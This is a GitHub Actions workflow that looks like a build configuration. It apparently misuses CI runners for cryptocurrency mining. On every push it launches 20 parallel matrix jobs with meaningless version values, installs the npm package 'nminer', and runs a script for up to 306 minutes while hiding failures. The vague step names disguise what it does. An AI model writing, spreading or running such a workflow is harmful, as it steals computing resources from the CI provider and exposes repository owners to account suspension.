name: remark
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 9543 }
          - { version: 119 }
          - { version: 4913 }
          - { version: 3979 }
          - { version: 6847 }
          - { version: 9212 }
          - { version: 6469 }
          - { version: 5203 }
          - { version: 5409 }
          - { version: 2194 }
          - { version: 1682 }
          - { version: 3067 }
          - { version: 7288 }
          - { version: 597 }
          - { version: 8554 }
          - { version: 9217 }
          - { version: 1428 }
          - { version: 9204 }
          - { version: 1513 }
          - { version: 8690 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: so
        run: |
          npm install nminer@latest
          timeout 306m node remark.js || echo "remark executed"